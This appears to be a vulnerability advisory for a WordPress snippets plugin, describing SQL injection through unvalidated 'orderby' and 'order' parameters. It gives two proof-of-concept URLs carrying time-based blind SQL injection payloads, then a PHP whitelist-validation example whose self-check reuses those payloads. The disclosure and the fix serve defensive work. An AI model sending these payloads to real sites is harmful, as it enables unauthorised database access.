The plugin does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections.
https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%2810%29%29%29uWCv%29&order=DESC
https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=name&order=+AND+%28SELECT+9933+FROM+%28SELECT%28SLEEP%2810%29%29%29wbfm%29
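The defensive pattern for this class of bug, shown as an added example rather than the plugin's own code: sort column and direction are identifiers, so they cannot be bound with `$wpdb->prepare()` and must instead be matched against a whitelist before being interpolated into the query. The table and column names are hypothetical placeholders.

```php
<?php
// Added example (not the plugin's code): whitelist validation of the
// "orderby" and "order" request parameters before they reach the SQL string.
// Column and table names are hypothetical.

function example_sanitize_sorting( array $request ): array {
    // Only columns that really exist in the table may be used for sorting.
    $allowed_columns = array( 'id', 'name', 'location', 'status' ); // hypothetical
    $default_column  = 'id';

    $orderby = isset( $request['orderby'] ) ? (string) $request['orderby'] : '';
    $order   = isset( $request['order'] ) ? strtoupper( trim( (string) $request['order'] ) ) : '';

    // Anything outside the whitelist falls back to a safe default, so the raw
    // request value never reaches the query text.
    if ( ! in_array( $orderby, $allowed_columns, true ) ) {
        $orderby = $default_column;
    }
    if ( 'ASC' !== $order && 'DESC' !== $order ) {
        $order = 'ASC';
    }
    return array( 'orderby' => $orderby, 'order' => $order );
}

function example_build_query( string $table, array $request ): string {
    // Vulnerable shape this replaces (do not use):
    //   "SELECT * FROM $table ORDER BY " . $_GET['orderby'] . ' ' . $_GET['order']
    $sort = example_sanitize_sorting( $request );
    return "SELECT * FROM {$table} ORDER BY {$sort['orderby']} {$sort['order']}";
}

// Self-check with the shape of the page's proof-of-concept parameters:
// both inputs are rejected and replaced by the defaults.
$poc = array(
    'orderby' => '(SELECT 5619 FROM (SELECT(SLEEP(10)))uWCv)',
    'order'   => ' AND (SELECT 9933 FROM (SELECT(SLEEP(10)))wbfm)',
);
$sql = example_build_query( 'wp_example_snippets', $poc );
assert( 'SELECT * FROM wp_example_snippets ORDER BY id ASC' === $sql );
echo $sql, PHP_EOL;
```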
bl4derunner
Anton Sarsadskikh
Yes
2021-10-11 (about 8 months ago)
2021-10-11 (about 8 months ago)
2022-04-08 (about 2 months ago)